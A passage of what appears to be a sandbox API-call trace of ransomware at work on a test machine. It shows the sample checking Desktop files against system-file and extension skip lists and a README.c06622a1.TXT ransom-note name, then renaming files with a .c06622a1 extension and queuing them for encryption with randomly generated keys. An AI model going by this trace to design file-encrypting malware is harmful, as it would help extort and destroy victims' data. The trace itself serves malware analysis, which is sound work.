_Str2="swf") returned -15 [0148.470] wcslen (_String="diagcfg") returned 0x7 [0148.470] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0148.470] wcslen (_String="diagpkg") returned 0x7 [0148.470] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0148.470] wcslen (_String="dll") returned 0x3 [0148.470] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0148.470] wcslen (_String="drv") returned 0x3 [0148.471] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0148.471] wcslen (_String="exe") returned 0x3 [0148.471] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0148.471] wcslen (_String="hlp") returned 0x3 [0148.471] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0148.471] wcslen (_String="icl") returned 0x3 [0148.471] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0148.471] wcslen (_String="icns") returned 0x4 [0148.471] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0148.471] wcslen (_String="ico") returned 0x3 [0148.471] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0148.471] wcslen (_String="ics") returned 0x3 [0148.471] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0148.471] wcslen (_String="idx") returned 0x3 [0148.471] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0148.471] wcslen (_String="ldf") returned 0x3 [0148.471] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0148.471] wcslen (_String="lnk") returned 0x3 [0148.471] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0148.471] wcslen (_String="mod") returned 0x3 [0148.471] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0148.471] wcslen (_String="mpa") returned 0x3 [0148.471] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0148.471] wcslen (_String="msc") returned 0x3 [0148.471] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0148.471] wcslen (_String="msp") returned 0x3 [0148.471] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0148.471] wcslen (_String="msstyles") returned 0x8 [0148.471] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0148.471] wcslen (_String="msu") returned 0x3 [0148.471] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0148.472] wcslen (_String="nls") returned 0x3 [0148.472] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0148.472] wcslen (_String="nomedia") returned 0x7 [0148.472] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0148.472] wcslen (_String="ocx") returned 0x3 [0148.472] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0148.472] wcslen (_String="prf") returned 0x3 [0148.472] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0148.472] wcslen (_String="ps1") returned 0x3 [0148.472] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0148.472] wcslen (_String="rom") returned 0x3 [0148.472] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0148.472] wcslen (_String="rtp") returned 0x3 [0148.472] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0148.472] wcslen (_String="scr") returned 0x3 [0148.472] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0148.472] wcslen (_String="shs") returned 0x3 [0148.472] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0148.472] wcslen (_String="spl") returned 0x3 [0148.472] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0148.472] wcslen (_String="sys") returned 0x3 [0148.472] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0148.472] wcslen (_String="theme") returned 0x5 [0148.472] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0148.472] wcslen (_String="themepack") returned 0x9 [0148.472] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0148.472] wcslen (_String="wpx") returned 0x3 [0148.472] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0148.472] wcslen (_String="lock") returned 0x4 [0148.472] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0148.472] wcslen (_String="key") returned 0x3 [0148.473] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0148.473] wcslen (_String="hta") returned 0x3 [0148.473] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0148.473] wcslen (_String="msi") returned 0x3 [0148.473] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0148.473] wcslen (_String="pdb") returned 0x3 [0148.473] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0148.473] wcslen (_String="sql") returned 0x3 [0148.473] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0148.473] wcslen (_String="sqlite") returned 0x6 [0148.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.473] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.473] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.473] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.473] wcscpy (in: _Dest=0x44d00cc, _Source="s9OE-nV-dkAhhF.swf" | out: _Dest="s9OE-nV-dkAhhF.swf") returned="s9OE-nV-dkAhhF.swf" [0148.473] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf", dwFileAttributes=0x80) returned 1 [0148.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s9oe-nv-dkahhf.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0148.473] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.474] ReadFile (in: hFile=0x63c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.474] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xff1541fa [0148.474] RtlComputeCrc32 (PartialCrc=0x41fa, Buffer=0x3feb74, Length=0x80) returned 0x7404242b [0148.474] RtlComputeCrc32 (PartialCrc=0x242b, Buffer=0x3feb74, Length=0x80) returned 0x76732423 [0148.474] RtlComputeCrc32 (PartialCrc=0x2423, Buffer=0x3feb74, Length=0x80) returned 0xec472c5c [0148.474] RtlComputeCrc32 (PartialCrc=0x2c5c, Buffer=0x3feb74, Length=0x80) returned 0xabb92142 [0148.474] CloseHandle (hObject=0x63c) returned 1 [0148.474] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.475] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf" [0148.475] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf") returned 0x3c [0148.475] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.475] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s9oe-nv-dkahhf.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s9oe-nv-dkahhf.swf.c06622a1"), dwFlags=0x8) returned 1 [0148.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s9OE-nV-dkAhhF.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s9oe-nv-dkahhf.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x63c [0148.477] CreateIoCompletionPort (FileHandle=0x63c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.477] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4dc0020 [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7319b07d [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5fb4f715 [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc692e06 [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ef36f85 [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x61368a07 [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25723e02 [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x476e244c [0148.483] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4b1a98f5 [0148.486] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4dc0094, Length=0x80) returned 0x7205add6 [0148.486] RtlComputeCrc32 (PartialCrc=0xadd6, Buffer=0x4dc0094, Length=0x80) returned 0x8d379050 [0148.486] RtlComputeCrc32 (PartialCrc=0x9050, Buffer=0x4dc0094, Length=0x80) returned 0x7579c2bd [0148.486] RtlComputeCrc32 (PartialCrc=0xc2bd, Buffer=0x4dc0094, Length=0x80) returned 0xe3c970ad [0148.486] RtlComputeCrc32 (PartialCrc=0x70ad, Buffer=0x4dc0094, Length=0x80) returned 0x9af14cd1 [0148.486] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4dc0020) returned 1 [0148.486] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.487] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.487] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x625121f0, ftCreationTime.dwHighDateTime=0x1d5d96b, ftLastAccessTime.dwLowDateTime=0x90810f20, ftLastAccessTime.dwHighDateTime=0x1d5e39f, ftLastWriteTime.dwLowDateTime=0x90810f20, ftLastWriteTime.dwHighDateTime=0x1d5e39f, nFileSizeHigh=0x0, nFileSizeLow=0x9b7b, dwReserved0=0x0, dwReserved1=0x0, cFileName="T5g8NL.m4a", cAlternateFileName="")) returned 1 [0148.487] _wcsicmp (_Str1="T5g8NL.m4a", _Str2="README.c06622a1.TXT") returned 2 [0148.487] wcsstr (_Str="T5g8NL.m4a", _SubStr="README") returned 0x0 [0148.487] _wcsicmp (_Str1="autorun.inf", _Str2="T5g8NL.m4a") returned -19 [0148.487] wcslen (_String="autorun.inf") returned 0xb [0148.487] _wcsicmp (_Str1="boot.ini", _Str2="T5g8NL.m4a") returned -18 [0148.487] wcslen (_String="boot.ini") returned 0x8 [0148.487] _wcsicmp (_Str1="bootfont.bin", _Str2="T5g8NL.m4a") returned -18 [0148.487] wcslen (_String="bootfont.bin") returned 0xc [0148.487] _wcsicmp (_Str1="bootsect.bak", _Str2="T5g8NL.m4a") returned -18 [0148.487] wcslen (_String="bootsect.bak") returned 0xc [0148.487] _wcsicmp (_Str1="desktop.ini", _Str2="T5g8NL.m4a") returned -16 [0148.487] wcslen (_String="desktop.ini") returned 0xb [0148.487] _wcsicmp (_Str1="iconcache.db", _Str2="T5g8NL.m4a") returned -11 [0148.487] wcslen (_String="iconcache.db") returned 0xc [0148.487] _wcsicmp (_Str1="ntldr", _Str2="T5g8NL.m4a") returned -6 [0148.487] wcslen (_String="ntldr") returned 0x5 [0148.487] _wcsicmp (_Str1="ntuser.dat", _Str2="T5g8NL.m4a") returned -6 [0148.487] wcslen (_String="ntuser.dat") returned 0xa [0148.487] _wcsicmp (_Str1="ntuser.dat.log", _Str2="T5g8NL.m4a") returned -6 [0148.487] wcslen (_String="ntuser.dat.log") returned 0xe [0148.487] _wcsicmp (_Str1="ntuser.ini", _Str2="T5g8NL.m4a") returned -6 [0148.487] wcslen (_String="ntuser.ini") returned 0xa [0148.487] _wcsicmp (_Str1="thumbs.db", _Str2="T5g8NL.m4a") returned 51 [0148.487] wcslen (_String="thumbs.db") returned 0x9 [0148.487] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0148.487] wcslen (_String="386") returned 0x3 [0148.487] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0148.488] wcslen (_String="adv") returned 0x3 [0148.488] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0148.488] wcslen (_String="ani") returned 0x3 [0148.488] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0148.488] wcslen (_String="bat") returned 0x3 [0148.488] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0148.488] wcslen (_String="bin") returned 0x3 [0148.488] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0148.488] wcslen (_String="cab") returned 0x3 [0148.488] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0148.488] wcslen (_String="cmd") returned 0x3 [0148.488] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0148.488] wcslen (_String="com") returned 0x3 [0148.488] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0148.488] wcslen (_String="cpl") returned 0x3 [0148.488] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0148.488] wcslen (_String="cur") returned 0x3 [0148.488] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0148.488] wcslen (_String="deskthemepack") returned 0xd [0148.488] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0148.488] wcslen (_String="diagcab") returned 0x7 [0148.488] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0148.488] wcslen (_String="diagcfg") returned 0x7 [0148.488] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0148.488] wcslen (_String="diagpkg") returned 0x7 [0148.488] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0148.488] wcslen (_String="dll") returned 0x3 [0148.488] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0148.488] wcslen (_String="drv") returned 0x3 [0148.488] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0148.489] wcslen (_String="exe") returned 0x3 [0148.489] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0148.489] wcslen (_String="hlp") returned 0x3 [0148.489] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0148.489] wcslen (_String="icl") returned 0x3 [0148.489] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0148.489] wcslen (_String="icns") returned 0x4 [0148.489] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0148.489] wcslen (_String="ico") returned 0x3 [0148.489] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0148.489] wcslen (_String="ics") returned 0x3 [0148.489] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0148.489] wcslen (_String="idx") returned 0x3 [0148.489] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0148.489] wcslen (_String="ldf") returned 0x3 [0148.489] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0148.489] wcslen (_String="lnk") returned 0x3 [0148.489] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0148.489] wcslen (_String="mod") returned 0x3 [0148.489] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0148.489] wcslen (_String="mpa") returned 0x3 [0148.489] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0148.489] wcslen (_String="msc") returned 0x3 [0148.489] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0148.489] wcslen (_String="msp") returned 0x3 [0148.489] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0148.489] wcslen (_String="msstyles") returned 0x8 [0148.489] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0148.489] wcslen (_String="msu") returned 0x3 [0148.489] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0148.489] wcslen (_String="nls") returned 0x3 [0148.490] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0148.490] wcslen (_String="nomedia") returned 0x7 [0148.490] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0148.490] wcslen (_String="ocx") returned 0x3 [0148.490] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0148.490] wcslen (_String="prf") returned 0x3 [0148.490] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0148.490] wcslen (_String="ps1") returned 0x3 [0148.490] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0148.490] wcslen (_String="rom") returned 0x3 [0148.490] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0148.490] wcslen (_String="rtp") returned 0x3 [0148.490] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0148.490] wcslen (_String="scr") returned 0x3 [0148.490] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0148.490] wcslen (_String="shs") returned 0x3 [0148.490] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0148.490] wcslen (_String="spl") returned 0x3 [0148.490] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0148.490] wcslen (_String="sys") returned 0x3 [0148.490] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0148.490] wcslen (_String="theme") returned 0x5 [0148.490] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0148.490] wcslen (_String="themepack") returned 0x9 [0148.490] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0148.490] wcslen (_String="wpx") returned 0x3 [0148.490] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0148.490] wcslen (_String="lock") returned 0x4 [0148.490] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0148.490] wcslen (_String="key") returned 0x3 [0148.491] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0148.491] wcslen (_String="hta") returned 0x3 [0148.491] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0148.491] wcslen (_String="msi") returned 0x3 [0148.491] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0148.491] wcslen (_String="pdb") returned 0x3 [0148.491] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0148.491] wcslen (_String="sql") returned 0x3 [0148.491] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0148.491] wcslen (_String="sqlite") returned 0x6 [0148.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0148.491] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.491] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0148.491] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0148.491] wcscpy (in: _Dest=0x44d00cc, _Source="T5g8NL.m4a" | out: _Dest="T5g8NL.m4a") returned="T5g8NL.m4a" [0148.491] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a", dwFileAttributes=0x80) returned 1 [0148.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t5g8nl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0148.491] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.492] ReadFile (in: hFile=0x1a8, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.492] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xb293bfce [0148.492] RtlComputeCrc32 (PartialCrc=0xbfce, Buffer=0x3feb74, Length=0x80) returned 0x5433df2a [0148.492] RtlComputeCrc32 (PartialCrc=0xdf2a, Buffer=0x3feb74, Length=0x80) returned 0x146ec3dc [0148.492] RtlComputeCrc32 (PartialCrc=0xc3dc, Buffer=0x3feb74, Length=0x80) returned 0x272218cc [0148.492] RtlComputeCrc32 (PartialCrc=0x18cc, Buffer=0x3feb74, Length=0x80) returned 0xbe283309 [0148.492] CloseHandle (hObject=0x1a8) returned 1 [0148.492] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.493] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a" [0148.493] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a") returned 0x34 [0148.493] wcscpy (in: _Dest=0x44e00e8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.493] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t5g8nl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t5g8nl.m4a.c06622a1"), dwFlags=0x8) returned 1 [0148.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T5g8NL.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t5g8nl.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0148.497] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.497] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4e50020 [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x149324c8 [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x43df3d26 [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6d6b13d1 [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40da2e8 [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1385a8fb [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3bd7cfcf [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x17f0b41d [0148.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x158a4629 [0148.506] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4e50094, Length=0x80) returned 0xb61b2abf [0148.506] RtlComputeCrc32 (PartialCrc=0x2abf, Buffer=0x4e50094, Length=0x80) returned 0xff3b4a1f [0148.506] RtlComputeCrc32 (PartialCrc=0x4a1f, Buffer=0x4e50094, Length=0x80) returned 0x761b705d [0148.506] RtlComputeCrc32 (PartialCrc=0x705d, Buffer=0x4e50094, Length=0x80) returned 0xdea69096 [0148.506] RtlComputeCrc32 (PartialCrc=0x9096, Buffer=0x4e50094, Length=0x80) returned 0x76a1a78d [0148.506] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4e50020) returned 1 [0148.506] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.507] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.507] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8337b530, ftCreationTime.dwHighDateTime=0x1d5dbd9, ftLastAccessTime.dwLowDateTime=0xb55026f0, ftLastAccessTime.dwHighDateTime=0x1d5dce8, ftLastWriteTime.dwLowDateTime=0xb55026f0, ftLastWriteTime.dwHighDateTime=0x1d5dce8, nFileSizeHigh=0x0, nFileSizeLow=0x808b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TnvVAS.m4a", cAlternateFileName="")) returned 1 [0148.507] _wcsicmp (_Str1="TnvVAS.m4a", _Str2="README.c06622a1.TXT") returned 2 [0148.507] wcsstr (_Str="TnvVAS.m4a", _SubStr="README") returned 0x0 [0148.507] _wcsicmp (_Str1="autorun.inf", _Str2="TnvVAS.m4a") returned -19 [0148.507] wcslen (_String="autorun.inf") returned 0xb [0148.507] _wcsicmp (_Str1="boot.ini", _Str2="TnvVAS.m4a") returned -18 [0148.507] wcslen (_String="boot.ini") returned 0x8 [0148.507] _wcsicmp (_Str1="bootfont.bin", _Str2="TnvVAS.m4a") returned -18 [0148.507] wcslen (_String="bootfont.bin") returned 0xc [0148.507] _wcsicmp (_Str1="bootsect.bak", _Str2="TnvVAS.m4a") returned -18 [0148.507] wcslen (_String="bootsect.bak") returned 0xc [0148.507] _wcsicmp (_Str1="desktop.ini", _Str2="TnvVAS.m4a") returned -16 [0148.507] wcslen (_String="desktop.ini") returned 0xb [0148.507] _wcsicmp (_Str1="iconcache.db", _Str2="TnvVAS.m4a") returned -11 [0148.507] wcslen (_String="iconcache.db") returned 0xc [0148.507] _wcsicmp (_Str1="ntldr", _Str2="TnvVAS.m4a") returned -6 [0148.507] wcslen (_String="ntldr") returned 0x5 [0148.507] _wcsicmp (_Str1="ntuser.dat", _Str2="TnvVAS.m4a") returned -6 [0148.507] wcslen (_String="ntuser.dat") returned 0xa [0148.507] _wcsicmp (_Str1="ntuser.dat.log", _Str2="TnvVAS.m4a") returned -6 [0148.507] wcslen (_String="ntuser.dat.log") returned 0xe [0148.507] _wcsicmp (_Str1="ntuser.ini", _Str2="TnvVAS.m4a") returned -6 [0148.507] wcslen (_String="ntuser.ini") returned 0xa [0148.507] _wcsicmp (_Str1="thumbs.db", _Str2="TnvVAS.m4a") returned -6 [0148.507] wcslen (_String="thumbs.db") returned 0x9 [0148.508] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0148.508] wcslen (_String="386") returned 0x3 [0148.508] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0148.508] wcslen (_String="adv") returned 0x3 [0148.508] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0148.508] wcslen (_String="ani") returned 0x3 [0148.508] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0148.508] wcslen (_String="bat") returned 0x3 [0148.508] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0148.508] wcslen (_String="bin") returned 0x3 [0148.508] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 